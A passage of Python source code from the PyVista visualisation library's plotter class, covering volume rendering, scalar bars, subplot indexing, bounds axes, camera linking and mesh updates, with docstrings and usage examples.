scalars = np.asarray(scalars)
if not np.issubdtype(scalars.dtype, np.number):
raise TypeError('Non-numeric scalars are currently not supported for volume rendering.')
if scalars.ndim != 1:
scalars = scalars.ravel()
if scalars.dtype == np.bool or scalars.dtype == np.uint8:
scalars = scalars.astype(np.float)
# Define mapper, volume, and add the correct properties
mappers = {
'fixed_point': vtk.vtkFixedPointVolumeRayCastMapper,
'gpu': vtk.vtkGPUVolumeRayCastMapper,
'open_gl': vtk.vtkOpenGLGPUVolumeRayCastMapper,
'smart': vtk.vtkSmartVolumeMapper,
}
if not isinstance(mapper, str) or mapper not in mappers.keys():
raise RuntimeError('Mapper ({}) unknown. Available volume mappers include: {}'.format(mapper, ', '.join(mappers.keys())))
self.mapper = make_mapper(mappers[mapper])
# Scalars interpolation approach
if scalars.shape[0] == volume.n_points:
volume._add_point_array(scalars, title, True)
self.mapper.SetScalarModeToUsePointData()
elif scalars.shape[0] == volume.n_cells:
volume._add_cell_array(scalars, title, True)
self.mapper.SetScalarModeToUseCellData()
else:
raise_not_matching(scalars, volume)
# Set scalars range
if clim is None:
clim = [np.nanmin(scalars), np.nanmax(scalars)]
elif isinstance(clim, float) or isinstance(clim, int):
clim = [-clim, clim]
###############
scalars = scalars.astype(np.float)
idxs0 = scalars < clim[0]
idxs1 = scalars > clim[1]
scalars[idxs0] = clim[0]
scalars[idxs1] = clim[1]
scalars = ((scalars - np.nanmin(scalars)) / (np.nanmax(scalars) - np.nanmin(scalars))) * 255
# scalars = scalars.astype(np.uint8)
volume[title] = scalars
self.mapper.scalar_range = clim
# Set colormap and build lookup table
table = vtk.vtkLookupTable()
# table.SetNanColor(nan_color) # NaN's are chopped out with current implementation
# above/below colors not supported with volume rendering
if isinstance(annotations, dict):
for val, anno in annotations.items():
table.SetAnnotation(float(val), str(anno))
if cmap is None: # Set default map if matplotlib is available
if has_matplotlib:
cmap = rcParams['cmap']
if cmap is not None:
if not has_matplotlib:
cmap = None
raise RuntimeError('Please install matplotlib for volume rendering.')
cmap = get_cmap_safe(cmap)
if categories:
if categories is True:
n_colors = len(np.unique(scalars))
elif isinstance(categories, int):
n_colors = categories
if flip_scalars:
cmap = cmap.reversed()
color_tf = vtk.vtkColorTransferFunction()
for ii in range(n_colors):
color_tf.AddRGBPoint(ii, *cmap(ii)[:-1])
# Set opacities
if isinstance(opacity, (float, int)):
opacity_values = [opacity] * n_colors
elif isinstance(opacity, str):
opacity_values = pyvista.opacity_transfer_function(opacity, n_colors)
elif isinstance(opacity, (np.ndarray, list, tuple)):
opacity = np.array(opacity)
opacity_values = opacity_transfer_function(opacity, n_colors)
opacity_tf = vtk.vtkPiecewiseFunction()
for ii in range(n_colors):
opacity_tf.AddPoint(ii, opacity_values[ii] / n_colors)
# Now put color tf and opacity tf into a lookup table for the scalar bar
table.SetNumberOfTableValues(n_colors)
lut = cmap(np.array(range(n_colors))) * 255
lut[:,3] = opacity_values
lut = lut.astype(np.uint8)
table.SetTable(VN.numpy_to_vtk(lut))
table.SetRange(*clim)
self.mapper.lookup_table = table
self.mapper.SetInputData(volume)
blending = blending.lower()
if blending in ['additive', 'add', 'sum']:
self.mapper.SetBlendModeToAdditive()
elif blending in ['average', 'avg', 'average_intensity']:
self.mapper.SetBlendModeToAverageIntensity()
elif blending in ['composite', 'comp']:
self.mapper.SetBlendModeToComposite()
elif blending in ['maximum', 'max', 'maximum_intensity']:
self.mapper.SetBlendModeToMaximumIntensity()
elif blending in ['minimum', 'min', 'minimum_intensity']:
self.mapper.SetBlendModeToMinimumIntensity()
else:
raise ValueError("Blending mode '{}' invalid. Please choose one of "
"'additive', 'average', 'composite', 'minimum', or "
"'maximum'.".format(blending))
self.mapper.Update()
self.volume = vtk.vtkVolume()
self.volume.SetMapper(self.mapper)
prop = vtk.vtkVolumeProperty()
prop.SetColor(color_tf)
prop.SetScalarOpacity(opacity_tf)
prop.SetAmbient(ambient)
prop.SetScalarOpacityUnitDistance(opacity_unit_distance)
prop.SetShade(shade)
prop.SetDiffuse(diffuse)
prop.SetSpecular(specular)
prop.SetSpecularPower(specular_power)
self.volume.SetProperty(prop)
actor, prop = self.add_actor(self.volume, reset_camera=reset_camera,
name=name, loc=loc, culling=culling,
pickable=pickable)
# Add scalar bar
if stitle is not None and show_scalar_bar:
self.add_scalar_bar(stitle, **scalar_bar_args)
return actor
def update_scalar_bar_range(self, clim, name=None):
"""Update the value range of the active or named scalar bar.
Parameters
----------
clim : 2 item list
The new range of the scalar bar. Example: ``[-1, 2]``.
name : str, optional
The title of the scalar bar to update.
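Examples
--------
Sketch of tightening the range of the active scalar bar after a mesh has
been added (the array name ``'height'`` is illustrative):
>>> import pyvista
>>> sphere = pyvista.Sphere()
>>> sphere['height'] = sphere.points[:, 2]
>>> plotter = pyvista.Plotter()
>>> _ = plotter.add_mesh(sphere, scalars='height')
>>> plotter.update_scalar_bar_range([-0.25, 0.25])
>>> plotter.show()  # doctest:+SKIP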
"""
if isinstance(clim, float) or isinstance(clim, int):
clim = [-clim, clim]
if len(clim) != 2:
raise TypeError('clim argument must be a length 2 iterable of values: (min, max).')
if name is None:
if not hasattr(self, 'mapper'):
raise RuntimeError('This plotter does not have an active mapper.')
self.mapper.scalar_range = clim
return
# Use the name to find the desired actor
def update_mapper(mapper_helper):
mapper_helper.scalar_range = clim
return
try:
for mh in self._scalar_bar_mappers[name]:
update_mapper(mh)
except KeyError:
raise KeyError('Name ({}) not valid/not found in this plotter.'.format(name))
return
@property
def camera_set(self):
"""Return if the camera of the active renderer has been set."""
return self.renderer.camera_set
def get_default_cam_pos(self, negative=False):
"""Return the default camera position of the active renderer."""
return self.renderer.get_default_cam_pos(negative=negative)
@camera_set.setter
def camera_set(self, is_set):
"""Set if the camera has been set on the active renderer."""
self.renderer.camera_set = is_set
@property
def renderer(self):
"""Return the active renderer."""
return self.renderers[self._active_renderer_index]
@property
def bounds(self):
"""Return the bounds of the active renderer."""
return self.renderer.bounds
@property
def length(self):
"""Return the length of the diagonal of the bounding box of the scene."""
return pyvista.Box(self.bounds).length
@property
def center(self):
"""Return the center of the active renderer."""
return self.renderer.center
def update_bounds_axes(self):
"""Update the bounds of the active renderer."""
return self.renderer.update_bounds_axes()
@property
def _scalar_bar_slots(self):
"""Return the scalar bar slots of the active renderer."""
return self.renderer._scalar_bar_slots
@property
def _scalar_bar_slot_lookup(self):
"""Return the scalar bar slot lookup of the active renderer."""
return self.renderer._scalar_bar_slot_lookup
@_scalar_bar_slots.setter
def _scalar_bar_slots(self, value):
"""Set the scalar bar slots of the active renderer."""
self.renderer._scalar_bar_slots = value
@_scalar_bar_slot_lookup.setter
def _scalar_bar_slot_lookup(self, value):
"""Set the scalar bar slot lookup of the active renderer."""
self.renderer._scalar_bar_slot_lookup = value
def clear(self):
"""Clear plot by removing all actors and properties."""
for renderer in self.renderers:
renderer.clear()
self._scalar_bar_slots = set(range(MAX_N_COLOR_BARS))
self._scalar_bar_slot_lookup = {}
self._scalar_bar_ranges = {}
self._scalar_bar_mappers = {}
self._scalar_bar_actors = {}
self._scalar_bar_widgets = {}
self.mesh = None
def remove_actor(self, actor, reset_camera=False):
"""Remove an actor from the Plotter.
Parameters
----------
actor : vtk.vtkActor
Actor that has previously added to the Renderer.
reset_camera : bool, optional
Resets camera so all actors can be seen.
Returns
-------
success : bool
True when actor removed. False when actor has not been
removed.
"""
for renderer in self.renderers:
renderer.remove_actor(actor, reset_camera)
return True
def add_actor(self, uinput, reset_camera=False, name=None, loc=None,
culling=False, pickable=True):
"""Add an actor to render window.
Creates an actor if input is a mapper.
Parameters
----------
uinput : vtk.vtkMapper or vtk.vtkActor
vtk mapper or vtk actor to be added.
reset_camera : bool, optional
Resets the camera when true.
loc : int, tuple, or list
Index of the renderer to add the actor to. For example,
``loc=2`` or ``loc=(1, 1)``. If None, selects the last
active Renderer.
culling : str, optional
Does not render faces that are culled. Options are ``'front'`` or
``'back'``. This can be helpful for dense surface meshes,
especially when edges are visible, but can cause flat
meshes to be partially displayed. Default False.
Returns
-------
actor : vtk.vtkActor
The actor.
actor_properties : vtk.Properties
Actor properties.
"""
# add actor to the correct render window
self._active_renderer_index = self.loc_to_index(loc)
renderer = self.renderers[self._active_renderer_index]
return renderer.add_actor(uinput=uinput, reset_camera=reset_camera,
name=name, culling=culling, pickable=pickable)
def loc_to_index(self, loc):
"""Return index of the render window given a location index.
Parameters
----------
loc : int, tuple, or list
Index of the renderer to add the actor to. For example,
``loc=2`` or ``loc=(1, 1)``.
Return
------
idx : int
Index of the render window.
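Examples
--------
For a 2x2 subplot layout the flat index is row-major, so the bottom-right
renderer maps to index 3:
>>> import pyvista
>>> plotter = pyvista.Plotter(shape=(2, 2))
>>> int(plotter.loc_to_index((1, 1)))
3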
"""
if loc is None:
return self._active_renderer_index
elif isinstance(loc, int):
return loc
elif isinstance(loc, collections.Iterable):
if not len(loc) == 2:
raise AssertionError('"loc" must contain two items')
index_row = loc[0]
index_column = loc[1]
if index_row < 0 or index_row >= self.shape[0]:
raise IndexError('Row index is out of range ({})'.format(self.shape[0]))
if index_column < 0 or index_column >= self.shape[1]:
raise IndexError('Column index is out of range ({})'.format(self.shape[1]))
sz = int(self.shape[0] * self.shape[1])
idxs = np.array([i for i in range(sz)], dtype=int).reshape(self.shape)
return idxs[index_row, index_column]
def index_to_loc(self, index):
"""Convert a 1D index location to the 2D location on the plotting grid."""
if len(self.shape) == 1:
return index
sz = int(self.shape[0] * self.shape[1])
idxs = np.array([i for i in range(sz)], dtype=int).reshape(self.shape)
args = np.argwhere(idxs == index)
if len(args) < 1:
raise RuntimeError('Index ({}) is out of range.'.format(index))
return args[0]
@property
def camera(self):
"""Return the active camera of the active renderer."""
return self.renderer.camera
@camera.setter
def camera(self, camera):
"""Set the active camera for the rendering scene."""
self.renderer.camera = camera
def enable_parallel_projection(self):
"""Enable parallel projection.
The camera will have a parallel projection. Parallel projection is
often useful when viewing images or 2D datasets.
"""
return self.renderer.enable_parallel_projection()
def disable_parallel_projection(self):
"""Reset the camera to use perspective projection."""
return self.renderer.disable_parallel_projection()
def add_axes_at_origin(self, x_color=None, y_color=None, z_color=None,
xlabel='X', ylabel='Y', zlabel='Z', line_width=2,
labels_off=False, loc=None):
"""Add axes actor at the origin of a render window.
Parameters
----------
loc : int, tuple, or list
Index of the renderer to add the actor to. For example,
``loc=2`` or ``loc=(1, 1)``. When None, defaults to the
active render window.
Return
------
marker_actor : vtk.vtkAxesActor
vtkAxesActor actor
"""
kwargs = locals()
_ = kwargs.pop('self')
_ = kwargs.pop('loc')
self._active_renderer_index = self.loc_to_index(loc)
return self.renderers[self._active_renderer_index].add_axes_at_origin(**kwargs)
def show_bounds(self, mesh=None, bounds=None, show_xaxis=True,
show_yaxis=True, show_zaxis=True, show_xlabels=True,
show_ylabels=True, show_zlabels=True, italic=False,
bold=True, shadow=False, font_size=None,
font_family=None, color=None,
xlabel='X Axis', ylabel='Y Axis', zlabel='Z Axis',
use_2d=False, grid=None, location='closest', ticks=None,
all_edges=False, corner_factor=0.5, fmt=None,
minor_ticks=False, loc=None, padding=0.0):
"""Add bounds axes.
Shows the bounds of the most recent input mesh unless mesh is specified.
Parameters
----------
mesh : vtkPolydata or unstructured grid, optional
Input mesh to draw bounds axes around
bounds : list or tuple, optional
Bounds to override mesh bounds.
[xmin, xmax, ymin, ymax, zmin, zmax]
show_xaxis : bool, optional
Makes x axis visible. Default True.
show_yaxis : bool, optional
Makes y axis visible. Default True.
show_zaxis : bool, optional
Makes z axis visible. Default True.
show_xlabels : bool, optional
Shows x labels. Default True.
show_ylabels : bool, optional
Shows y labels. Default True.
show_zlabels : bool, optional
Shows z labels. Default True.
italic : bool, optional
Italicises axis labels and numbers. Default False.
bold : bool, optional
Bolds axis labels and numbers. Default True.
shadow : bool, optional
Adds a black shadow to the text. Default False.
font_size : float, optional
Sets the size of the label font. Defaults to 16.
font_family : string, optional
Font family. Must be either courier, times, or arial.
color : string or 3 item list, optional
Color of all labels and axis titles. Default white.
Either a string, rgb list, or hex color string. For example:
color='white'
color='w'
color=[1, 1, 1]
color='#FFFFFF'
xlabel : string, optional
Title of the x axis. Default "X Axis"
ylabel : string, optional
Title of the y axis. Default "Y Axis"
zlabel : string, optional
Title of the z axis. Default "Z Axis"
use_2d : bool, optional
A bug with vtk 6.3 on Windows seems to cause this function
to crash; this can be enabled for smoother plotting in
other environments.
grid : bool or str, optional
Add grid lines to the backface (``True``, ``'back'``, or
``'backface'``) or to the frontface (``'front'``,
``'frontface'``) of the axes actor.
location : str, optional
Set how the axes are drawn: either static (``'all'``),
closest triad (``'front'``), furthest triad (``'back'``),
static closest to the origin (``'origin'``), or outer
edges (``'outer'``) in relation to the camera
position. Options include: ``'all', 'front', 'back',
'origin', 'outer'``
ticks : str, optional
Set how the ticks are drawn on the axes grid. Options include:
``'inside', 'outside', 'both'``
all_edges : bool, optional
Adds an unlabeled and unticked box at the boundaries of
plot. Useful for when wanting to plot outer grids while
still retaining all edges of the boundary.
corner_factor : float, optional
If ``all_edges``, this is the factor along each axis to
draw the default box. Default is 0.5 to show the full box.
loc : int, tuple, or list
Index of the renderer to add the actor to. For example,
``loc=2`` or ``loc=(1, 1)``. If None, selects the last
active Renderer.
padding : float, optional
An optional percent padding along each axial direction to cushion
the datasets in the scene from the axes annotations. Defaults to
have no padding
Return
------
cube_axes_actor : vtk.vtkCubeAxesActor
Bounds actor
Examples
--------
>>> import pyvista
>>> from pyvista import examples
>>> mesh = pyvista.Sphere()
>>> plotter = pyvista.Plotter()
>>> _ = plotter.add_mesh(mesh)
>>> _ = plotter.show_bounds(grid='front', location='outer', all_edges=True)
>>> plotter.show() # doctest:+SKIP
"""
kwargs = locals()
_ = kwargs.pop('self')
_ = kwargs.pop('loc')
self._active_renderer_index = self.loc_to_index(loc)
renderer = self.renderers[self._active_renderer_index]
renderer.show_bounds(**kwargs)
def add_bounds_axes(self, *args, **kwargs):
"""Add bounds axes.
DEPRECATED: Please use ``show_bounds`` or ``show_grid``.
"""
logging.warning('`add_bounds_axes` is deprecated. Use `show_bounds` or `show_grid`.')
return self.show_bounds(*args, **kwargs)
def add_bounding_box(self, color=None, corner_factor=0.5, line_width=None,
opacity=1.0, render_lines_as_tubes=False,
lighting=None, reset_camera=None, outline=True,
culling='front', loc=None):
"""Add an unlabeled and unticked box at the boundaries of the plot.
Useful for when wanting to plot outer grids while still retaining
all edges of the boundary.
Parameters
----------
corner_factor : float, optional
This is the factor along each axis to draw the default
box. Default is 0.5 to show the full box.
line_width : float, optional
Thickness of lines.
opacity : float, optional
Opacity of mesh. Should be between 0 and 1. Default 1.0
outline : bool
Default is ``True``. When ``False``, a box with faces is shown with
the specified culling.
culling : str, optional
Does not render faces that are culled. Options are ``'front'`` or
``'back'``. Default is ``'front'`` for bounding box.
loc : int, tuple, or list
Index of the renderer to add the actor to. For example,
``loc=2`` or ``loc=(1, 1)``. If None, selects the last
active Renderer.
"""
kwargs = locals()
_ = kwargs.pop('self')
_ = kwargs.pop('loc')
self._active_renderer_index = self.loc_to_index(loc)
renderer = self.renderers[self._active_renderer_index]
return renderer.add_bounding_box(**kwargs)
def remove_bounding_box(self, loc=None):
"""Remove bounding box from the active renderer.
Parameters
----------
loc : int, tuple, or list
Index of the renderer to add the actor to. For example,
``loc=2`` or ``loc=(1, 1)``. If None, selects the last
active Renderer.
"""
self._active_renderer_index = self.loc_to_index(loc)
renderer = self.renderers[self._active_renderer_index]
renderer.remove_bounding_box()
def remove_bounds_axes(self, loc=None):
"""Remove bounds axes from the active renderer.
Parameters
----------
loc : int, tuple, or list
Index of the renderer to add the actor to. For example,
``loc=2`` or ``loc=(1, 1)``. If None, selects the last
active Renderer.
"""
self._active_renderer_index = self.loc_to_index(loc)
renderer = self.renderers[self._active_renderer_index]
renderer.remove_bounds_axes()
def subplot(self, index_row, index_column=None):
"""Set the active subplot.
Parameters
----------
index_row : int
Index of the subplot to activate along the rows.
index_column : int
Index of the subplot to activate along the columns.
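Examples
--------
Sketch of a 1x2 layout with a different mesh in each subplot:
>>> import pyvista
>>> plotter = pyvista.Plotter(shape=(1, 2))
>>> plotter.subplot(0, 0)
>>> _ = plotter.add_mesh(pyvista.Sphere())
>>> plotter.subplot(0, 1)
>>> _ = plotter.add_mesh(pyvista.Cube())
>>> plotter.show()  # doctest:+SKIP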
"""
if len(self.shape) == 1:
self._active_renderer_index = index_row
return
if index_row < 0 or index_row >= self.shape[0]:
raise IndexError('Row index is out of range ({})'.format(self.shape[0]))
if index_column < 0 or index_column >= self.shape[1]:
raise IndexError('Column index is out of range ({})'.format(self.shape[1]))
self._active_renderer_index = self.loc_to_index((index_row, index_column))
def link_views(self, views=0):
"""Link the views' cameras.
Parameters
----------
views : int | tuple or list
If ``views`` is int, link the views to the given view
index or if ``views`` is a tuple or a list, link the given
views cameras.
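Examples
--------
Sketch linking the cameras of a 1x2 layout so both subplots pan and zoom
together:
>>> import pyvista
>>> plotter = pyvista.Plotter(shape=(1, 2))
>>> plotter.subplot(0, 0)
>>> _ = plotter.add_mesh(pyvista.Sphere())
>>> plotter.subplot(0, 1)
>>> _ = plotter.add_mesh(pyvista.Cube())
>>> plotter.link_views()
>>> plotter.show()  # doctest:+SKIP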
"""
if isinstance(views, int):
for renderer in self.renderers:
renderer.camera = self.renderers[views].camera
elif isinstance(views, collections.Iterable):
for view_index in views:
self.renderers[view_index].camera = \
self.renderers[views[0]].camera
else:
raise TypeError('Expected type is int, list or tuple:'
'{} is given'.format(type(views)))
def unlink_views(self, views=None):
"""Unlink the views' cameras.
Parameters
----------
views : None | int | tuple or list
If ``views`` is None unlink all the views, if ``views``
is int unlink the selected view's camera or if ``views``
is a tuple or a list, unlink the given views cameras.
"""
if views is None:
for renderer in self.renderers:
renderer.camera = vtk.vtkCamera()
renderer.reset_camera()
elif isinstance(views, int):
self.renderers[views].camera = vtk.vtkCamera()
self.renderers[views].reset_camera()
elif isinstance(views, collections.Iterable):
for view_index in views:
self.renderers[view_index].camera = vtk.vtkCamera()
self.renderers[view_index].reset_camera()
else:
raise TypeError('Expected type is None, int, list or tuple:'
'{} is given'.format(type(views)))
def show_grid(self, **kwargs):
"""Show gridlines and axes labels.
A wrapped implementation of ``show_bounds`` to change default
behaviour to use gridlines and showing the axes labels on the outer
edges. This is intended to be similar to ``matplotlib``'s ``grid``
function.
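Examples
--------
A minimal sketch; any keyword accepted by ``show_bounds`` can be passed
through:
>>> import pyvista
>>> plotter = pyvista.Plotter()
>>> _ = plotter.add_mesh(pyvista.Sphere())
>>> _ = plotter.show_grid()
>>> plotter.show()  # doctest:+SKIP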
"""
kwargs.setdefault('grid', 'back')
kwargs.setdefault('location', 'outer')
kwargs.setdefault('ticks', 'both')
return self.show_bounds(**kwargs)
def set_scale(self, xscale=None, yscale=None, zscale=None, reset_camera=True):
"""Scale all the datasets in the scene of the active renderer.
Scaling is performed independently on the X, Y and Z axis.
A scale of zero is illegal and will be replaced with one.
Parameters
----------
xscale : float, optional
Scaling of the x axis. Must be greater than zero.
yscale : float, optional
Scaling of the y axis. Must be greater than zero.
zscale : float, optional
Scaling of the z axis. Must be greater than zero.
reset_camera : bool, optional
Resets camera so all actors can be seen.
"""
self.renderer.set_scale(xscale, yscale, zscale, reset_camera)
@property
def scale(self):
"""Return the scaling of the active renderer."""
return self.renderer.scale
def add_scalar_bar(self, title=None, n_labels=5, italic=False,
bold=False, title_font_size=None,
label_font_size=None, color=None,
font_family=None, shadow=False, mapper=None,
width=None, height=None, position_x=None,
position_y=None, vertical=None,
interactive=False, fmt=None, use_opacity=True,
outline=False, nan_annotation=False,
below_label=None, above_label=None,
background_color=None, n_colors=None, fill=False):
"""Create scalar bar using the ranges as set by the last input mesh.
Parameters
----------
title : string, optional
Title of the scalar bar. Default None
n_labels : int, optional
Number of labels to use for the scalar bar.
italic : bool, optional
Italicises title and bar labels. Default False.
bold : bool, optional
Bolds title and bar labels. Default False.
title_font_size : float, optional
Sets the size of the title font. Defaults to None and is sized
automatically.
label_font_size : float, optional
Sets the size of the label font. Defaults to None and is sized
automatically.
color : string or 3 item list, optional, defaults to white
Either a string, rgb list, or hex color string. For example:
color='white'
color='w'
color=[1, 1, 1]
color='#FFFFFF'
font_family : string, optional
Font family. Must be either courier, times, or arial.
shadow : bool, optional
Adds a black shadow to the text. Defaults to False
width : float, optional
The percentage (0 to 1) width of the window for the colorbar
height : float, optional
The percentage (0 to 1) height of the window for the colorbar
position_x : float, optional
The percentage (0 to 1) along the window's horizontal
direction to place the bottom left corner of the colorbar
position_y : float, optional
The percentage (0 to 1) along the window's vertical
direction to place the bottom left corner of the colorbar
interactive : bool, optional
Use a widget to control the size and location of the scalar bar.
use_opacity : bool, optional
Optionally display the opacity mapping on the scalar bar
outline : bool, optional
Optionally outline the scalar bar to make opacity mappings more
obvious.
nan_annotation : bool, optional
Annotate the NaN color
below_label : str, optional
String annotation for values below the scalars range
above_label : str, optional
String annotation for values above the scalars range
background_color : array, optional
The color used for the background in RGB format.
n_colors : int, optional
The maximum number of colors displayed in the scalar bar.
fill : bool
Draw a filled box behind the scalar bar with the ``background_color``
Notes
-----
Setting title_font_size, or label_font_size disables automatic font
sizing for both the title and label.
"""
if font_family is None:
font_family = rcParams['font']['family']
if label_font_size is None:
label_font_size = rcParams['font']['label_size']
if title_font_size is None:
title_font_size = rcParams['font']['title_size']
if color is None:
color = rcParams['font']['color']
if fmt is None:
fmt = rcParams['font']['fmt']
if vertical is None:
if rcParams['colorbar_orientation'].lower() == 'vertical':
vertical = True
# Automatically choose size if not specified
if width is None:
if vertical:
width = rcParams['colorbar_vertical']['width']
else:
width = rcParams['colorbar_horizontal']['width']
if height is None:
if vertical:
height = rcParams['colorbar_vertical']['height']
else:
height = rcParams['colorbar_horizontal']['height']
# check if the mapper exists
if mapper is None:
if not hasattr(self, 'mapper') or self.mapper is None:
raise Exception('Mapper does not exist. '
'Add a mesh with scalars first.')
mapper = self.mapper
if title:
# Check that this data hasn't already been plotted
if title in list(self._scalar_bar_ranges.keys()):
clim = list(self._scalar_bar_ranges[title])
newrng = mapper.scalar_range
oldmappers = self._scalar_bar_mappers[title]
# get max for range and reset everything
if newrng[0] < clim[0]:
clim[0] = newrng[0]
if newrng[1] > clim[1]:
clim[1] = newrng[1]
for mh in oldmappers:
mh.scalar_range = clim[0], clim[1]
mapper.scalar_range = clim[0], clim[1]
self._scalar_bar_mappers[title].append(mapper)
self._scalar_bar_ranges[title] = clim
# Color bar already present and ready to be used so returning
return
# Automatically choose location if not specified
if position_x is None or position_y is None:
try:
slot = min(self._scalar_bar_slots)
self._scalar_bar_slots.remove(slot)
self._scalar_bar_slot_lookup[title] = slot
except:
raise RuntimeError('Maximum number of color bars reached.')
if position_x is None:
if vertical:
position_x = rcParams['colorbar_vertical']['position_x']
position_x -= slot * (width + 0.2 * width)
else:
position_x = rcParams['colorbar_horizontal']['position_x']
if position_y is None:
if vertical:
position_y = rcParams['colorbar_vertical']['position_y']
else:
position_y = rcParams['colorbar_horizontal']['position_y']
position_y += slot * height
# Adjust to make sure on the screen
if position_x + width > 1:
position_x -= width
if position_y + height > 1:
position_y -= height
# parse color
color = parse_color(color)
# Create scalar bar
self.scalar_bar = vtk.vtkScalarBarActor()
if background_color is not None:
background_color = parse_color(background_color, opacity=1.0)
background_color = np.array(background_color) * 255
self.scalar_bar.GetBackgroundProperty().SetColor(background_color[0:3])
if fill:
self.scalar_bar.DrawBackgroundOn()
lut = vtk.vtkLookupTable()
lut.DeepCopy(mapper.lookup_table)
ctable = vtk_to_numpy(lut.GetTable())
alphas = ctable[:, -1][:, np.newaxis] / 255.
use_table = ctable.copy()
use_table[:, -1] = 255.
ctable = (use_table * alphas) + background_color * (1 - alphas)
lut.SetTable(numpy_to_vtk(ctable, array_type=vtk.VTK_UNSIGNED_CHAR))
else:
lut = mapper.lookup_table
self.scalar_bar.SetLookupTable(lut)
if n_colors is not None:
self.scalar_bar.SetMaximumNumberOfColors(n_colors)
if n_labels < 1:
self.scalar_bar.DrawTickLabelsOff()
else:
self.scalar_bar.DrawTickLabelsOn()
self.scalar_bar.SetNumberOfLabels(n_labels)
if nan_annotation:
self.scalar_bar.DrawNanAnnotationOn()
if above_label:
self.scalar_bar.DrawAboveRangeSwatchOn()
self.scalar_bar.SetAboveRangeAnnotation(above_label)
if below_label:
self.scalar_bar.DrawBelowRangeSwatchOn()
self.scalar_bar.SetBelowRangeAnnotation(below_label)
# edit the size of the colorbar
self.scalar_bar.SetHeight(height)
self.scalar_bar.SetWidth(width)
self.scalar_bar.SetPosition(position_x, position_y)
if fmt is not None:
self.scalar_bar.SetLabelFormat(fmt)
if vertical:
self.scalar_bar.SetOrientationToVertical()
else:
self.scalar_bar.SetOrientationToHorizontal()
if label_font_size is None or title_font_size is None:
self.scalar_bar.UnconstrainedFontSizeOn()
self.scalar_bar.AnnotationTextScalingOn()
label_text = self.scalar_bar.GetLabelTextProperty()
anno_text = self.scalar_bar.GetAnnotationTextProperty()
label_text.SetColor(color)
anno_text.SetColor(color)
label_text.SetShadow(shadow)
anno_text.SetShadow(shadow)
# Set font
label_text.SetFontFamily(parse_font_family(font_family))
anno_text.SetFontFamily(parse_font_family(font_family))
label_text.SetItalic(italic)
anno_text.SetItalic(italic)
label_text.SetBold(bold)
anno_text.SetBold(bold)
if label_font_size:
label_text.SetFontSize(label_font_size)
anno_text.SetFontSize(label_font_size)
# Set properties
if title:
clim = mapper.scalar_range
self._scalar_bar_ranges[title] = clim
self._scalar_bar_mappers[title] = [mapper]
self.scalar_bar.SetTitle(title)
title_text = self.scalar_bar.GetTitleTextProperty()
title_text.SetJustificationToCentered()
title_text.SetItalic(italic)
title_text.SetBold(bold)
title_text.SetShadow(shadow)
if title_font_size:
title_text.SetFontSize(title_font_size)
# Set font
title_text.SetFontFamily(parse_font_family(font_family))
# set color
title_text.SetColor(color)
self._scalar_bar_actors[title] = self.scalar_bar
if interactive is None:
interactive = rcParams['interactive']
if self.shape != (1, 1):
interactive = False
elif interactive and self.shape != (1, 1):
err_str = 'Interactive scalar bars disabled for multi-renderer plots'
raise Exception(err_str)
if interactive and hasattr(self, 'iren'):
self.scalar_widget = vtk.vtkScalarBarWidget()
self.scalar_widget.SetScalarBarActor(self.scalar_bar)
self.scalar_widget.SetInteractor(self.iren)
self.scalar_widget.SetEnabled(1)
rep = self.scalar_widget.GetRepresentation()
# self.scalar_widget.On()
if vertical is True or vertical is None:
rep.SetOrientation(1) # 0 = Horizontal, 1 = Vertical
else:
rep.SetOrientation(0) # 0 = Horizontal, 1 = Vertical
self._scalar_bar_widgets[title] = self.scalar_widget
if use_opacity:
self.scalar_bar.SetUseOpacity(True)
if outline:
self.scalar_bar.SetDrawFrame(True)
frame_prop = self.scalar_bar.GetFrameProperty()
frame_prop.SetColor(color)
else:
self.scalar_bar.SetDrawFrame(False)
self.add_actor(self.scalar_bar, reset_camera=False, pickable=False)
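# Illustrative sketch (added comments, not part of the original source):
# drawing a titled scalar bar for a mesh with scalars, assuming
# ``examples.load_uniform`` and its 'Spatial Point Data' array are available.
# >>> import pyvista
# >>> from pyvista import examples
# >>> mesh = examples.load_uniform()
# >>> pl = pyvista.Plotter()
# >>> _ = pl.add_mesh(mesh, scalars='Spatial Point Data', show_scalar_bar=False)
# >>> pl.add_scalar_bar(title='Point Data', n_labels=3, vertical=True)
# >>> pl.show()  # doctest:+SKIP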
def update_scalars(self, scalars, mesh=None, render=True):
"""Update scalars of an object in the plotter.
Parameters
----------
scalars : np.ndarray
Scalars to replace existing scalars.
mesh : vtk.PolyData or vtk.UnstructuredGrid, optional
Object that has already been added to the Plotter. If
None, uses last added mesh.
render : bool, optional
Forces an update to the render window. Default True.
"""
if mesh is None:
mesh = self.mesh
if isinstance(mesh, (collections.abc.Iterable, pyvista.MultiBlock)):
# Recursive if need to update scalars on many meshes
for m in mesh:
self.update_scalars(scalars, mesh=m, render=False)
if render:
self.ren_win.Render()
return
if isinstance(scalars, str):
# Grab scalars array if name given
scalars = get_array(mesh, scalars)
if scalars is None:
if render:
self.ren_win.Render()
return
if scalars.shape[0] == mesh.GetNumberOfPoints():
data = mesh.GetPointData()
elif scalars.shape[0] == mesh.GetNumberOfCells():
data = mesh.GetCellData()
else:
raise_not_matching(scalars, mesh)
vtk_scalars = data.GetScalars()
if vtk_scalars is None:
raise Exception('No active scalars')
s = convert_array(vtk_scalars)
s[:] = scalars
data.Modified()
try:
# Why are the points updated here? Not all datasets have points
# and only the scalars array is modified by this function...
mesh.GetPoints().Modified()
except:
pass
if render:
self.ren_win.Render()
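# Illustrative sketch (added comments, not part of the original source):
# replacing the scalars of an already-added mesh in place, continuing the
# ``pl``/``mesh`` names from the scalar bar sketch above.
# >>> import numpy as np
# >>> new_scalars = np.random.random(mesh.n_points)
# >>> pl.update_scalars(new_scalars, mesh=mesh, render=True)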
def update_coordinates(self, points, mesh=None, render=True):
"""Update the points of an object in the plotter.
Parameters
----------
points : np.ndarray
Points to replace existing points.
mesh : vtk.PolyData or vtk.UnstructuredGrid, optional
Object that has already been added to the Plotter. If
None, uses last added mesh.
render : bool, optional
Forces an update to the render window. Default True.
"""
if mesh is None:
mesh = self.mesh
mesh.points = points
if render:
self._render()
def close(self):
"""Close the render window."""
# must close out widgets first
super(BasePlotter, self).close()
# Grab screenshots of last render
self.last_image = self.screenshot(None, return_img=True)
self.last_image_depth = self.get_image_depth()
if hasattr(self, 'axes_widget'):
del self.axes_widget
if hasattr(self, 'scalar_widget'):
del self.scalar_widget
# reset scalar bar stuff
self.clear()
if hasattr(self, 'ren_win'):
self.ren_win.Finalize()
del self.ren_win
if hasattr(self, '_style'):
del self._style
if hasattr(self, 'iren'):
self.iren.RemoveAllObservers()
